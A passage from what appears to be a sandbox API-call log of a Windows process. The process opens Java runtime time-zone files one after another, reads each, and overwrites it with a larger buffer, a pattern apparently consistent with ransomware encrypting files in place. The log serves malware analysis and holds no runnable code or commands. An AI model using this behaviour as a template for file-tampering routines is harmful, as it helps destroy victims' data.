dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.184] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.184] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x75 [0136.184] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.184] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.184] ReleaseMutex (hMutex=0x168) returned 1 [0136.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Davis", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Davis", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Davis", lpUsedDefaultChar=0x0) returned 5 [0136.185] ReadFile (in: hFile=0x208, lpBuffer=0x1efcc68, nNumberOfBytesToRead=0x75, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1efcc68*, lpNumberOfBytesRead=0x2e9f2bc*=0x75, lpOverlapped=0x0) returned 1 [0136.187] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.187] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5fd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5fd, lpOverlapped=0x0) returned 1 [0136.187] CloseHandle (hObject=0x208) returned 1 [0136.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.188] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.188] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0136.189] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.189] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.189] ReleaseMutex (hMutex=0x168) returned 1 [0136.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vostok", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vostok", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vostok", lpUsedDefaultChar=0x0) returned 6 [0136.189] ReadFile (in: hFile=0x208, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.190] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.190] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.191] CloseHandle (hObject=0x208) returned 1 [0136.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.191] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.191] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e9 [0136.192] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.192] ReleaseMutex (hMutex=0x168) returned 1 [0136.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Baghdad", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Baghdad", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Baghdad", lpUsedDefaultChar=0x0) returned 7 [0136.192] ReadFile (in: hFile=0x208, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e9, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e9, lpOverlapped=0x0) returned 1 [0136.193] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.193] WriteFile (in: hFile=0x208, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x771, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2e9f2d0*=0x771, lpOverlapped=0x0) returned 1 [0136.193] CloseHandle (hObject=0x208) returned 1 [0136.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.194] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.194] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb5 [0136.194] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.195] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.195] ReleaseMutex (hMutex=0x168) returned 1 [0136.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chongqing", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chongqing", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chongqing", lpUsedDefaultChar=0x0) returned 9 [0136.195] ReadFile (in: hFile=0x208, lpBuffer=0x1ee01c8, nNumberOfBytesToRead=0xb5, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee01c8*, lpNumberOfBytesRead=0x2e9f2bc*=0xb5, lpOverlapped=0x0) returned 1 [0136.196] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.196] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63d, lpOverlapped=0x0) returned 1 [0136.196] CloseHandle (hObject=0x208) returned 1 [0136.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.197] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.198] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xcd [0136.198] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.198] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.198] ReleaseMutex (hMutex=0x168) returned 1 [0136.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Harbin", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Harbin", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Harbin", lpUsedDefaultChar=0x0) returned 6 [0136.198] ReadFile (in: hFile=0x208, lpBuffer=0x1ed5ff8, nNumberOfBytesToRead=0xcd, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5ff8*, lpNumberOfBytesRead=0x2e9f2bc*=0xcd, lpOverlapped=0x0) returned 1 [0136.199] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.199] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x655, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x655, lpOverlapped=0x0) returned 1 [0136.199] CloseHandle (hObject=0x208) returned 1 [0136.200] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.229] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.229] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d4 [0136.229] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.229] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.229] ReleaseMutex (hMutex=0x168) returned 1 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jerusalem", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jerusalem", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jerusalem", lpUsedDefaultChar=0x0) returned 9 [0136.230] ReadFile (in: hFile=0x208, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4d4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d4, lpOverlapped=0x0) returned 1 [0136.252] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.252] WriteFile (in: hFile=0x208, lpBuffer=0x28741b8*, nNumberOfBytesToWrite=0xa5c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28741b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa5c, lpOverlapped=0x0) returned 1 [0136.253] CloseHandle (hObject=0x208) returned 1 [0136.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.254] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.255] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x245 [0136.255] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.255] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.255] ReleaseMutex (hMutex=0x168) returned 1 [0136.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Krasnoyarsk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Krasnoyarsk", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Krasnoyarsk", lpUsedDefaultChar=0x0) returned 11 [0136.255] ReadFile (in: hFile=0x208, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2e9f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.256] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.256] WriteFile (in: hFile=0x208, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.257] CloseHandle (hObject=0x208) returned 1 [0136.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.259] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.259] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0136.259] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.259] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.259] ReleaseMutex (hMutex=0x168) returned 1 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muscat", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muscat", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Muscat", lpUsedDefaultChar=0x0) returned 6 [0136.259] ReadFile (in: hFile=0x208, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.260] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.260] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.261] CloseHandle (hObject=0x208) returned 1 [0136.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.262] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.262] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x65 [0136.262] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.263] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.263] ReleaseMutex (hMutex=0x168) returned 1 [0136.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pyongyang", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pyongyang", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pyongyang", lpUsedDefaultChar=0x0) returned 9 [0136.263] ReadFile (in: hFile=0x208, lpBuffer=0x1eba9f8, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eba9f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x65, lpOverlapped=0x0) returned 1 [0136.264] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.264] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5ed, lpOverlapped=0x0) returned 1 [0136.265] CloseHandle (hObject=0x208) returned 1 [0136.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.274] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.275] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x249 [0136.275] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.275] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.275] ReleaseMutex (hMutex=0x168) returned 1 [0136.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sakhalin", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sakhalin", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sakhalin", lpUsedDefaultChar=0x0) returned 8 [0136.275] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2e9f2bc*=0x249, lpOverlapped=0x0) returned 1 [0136.276] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.276] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7d1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7d1, lpOverlapped=0x0) returned 1 [0136.277] CloseHandle (hObject=0x1f0) returned 1 [0136.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.282] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.282] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x37c [0136.283] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.283] ReleaseMutex (hMutex=0x168) returned 1 [0136.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tehran", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tehran", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tehran", lpUsedDefaultChar=0x0) returned 6 [0136.283] ReadFile (in: hFile=0x208, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x37c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x2e9f2bc*=0x37c, lpOverlapped=0x0) returned 1 [0136.336] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.336] WriteFile (in: hFile=0x208, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x904, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x904, lpOverlapped=0x0) returned 1 [0136.336] CloseHandle (hObject=0x208) 